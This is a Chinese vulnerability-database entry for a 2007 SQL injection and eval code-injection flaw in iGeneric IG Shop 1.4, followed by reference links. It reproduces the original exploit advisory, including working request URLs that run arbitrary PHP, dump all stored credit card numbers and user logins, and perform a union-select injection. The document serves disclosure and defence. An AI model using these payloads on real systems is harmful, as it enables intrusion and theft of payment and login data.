IGeneric IG Shop SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111950 漏洞类型 SQL注入
发布时间 2007-01-05 更新时间 2007-01-10
CVE编号 CVE-2007-0132 CNNVD-ID CNNVD-200701-082
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-082
|漏洞详情
iGenericiGShop1.4版本的compare_product.php中存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
"If eval is the answer,  then you are asking the wrong question."
--Unknowen

ig-shop suffers from two eval's that can be controlled by an attacker:
http://127.0.0.1/ig_shop/cart.php?action=;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");

http://127.0.0.1/ig_shop/page.php?action=;phpinfo();//
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders
Some of these variables can be decoded using the unserlize()  funciton.

Dumps all logins:
http://127.0.0.1/ig_shop/cart.php?action=;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users


sql injection works regardless of magic_quotes_gpc.
http://127.0.0.1/ig_shop/compare_product.php?id=1%20union%20select%201
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks. 

vendor's page:http://www.igeneric.co.uk/

By Michael Brooks. 

# milw0rm.com [2007-01-05]
|参考资料

来源:MILW0RM
名称:3083
链接:http://www.milw0rm.com/exploits/3083
来源:VUPEN
名称:ADV-2007-0056
链接:http://www.frsirt.com/english/advisories/2007/0056
来源:SECUNIA
名称:23604
链接:http://secunia.com/advisories/23604
来源:MISC
链接:http://packetstormsecurity.nl/0701-exploits/igshop10-multiple.txt
来源:OSVDB
名称:33385
链接:http://osvdb.org/33385
来源:XF
名称:igshop-compareproduct-sql-injection(31299)
链接:http://xforce.iss.net/xforce/xfdb/31299
来源:BID
名称:21874
链接:http://www.securityfocus.com/bid/21874
来源:BUGTRAQ
名称:20070105IGShopremotecodeexecution
链接:http://www.securityfocus.com/archive/1/archive/1/456043/100/0/threaded
来源:MILW0RM
名称:3083
链接:http://milw0rm.com/exploits/3083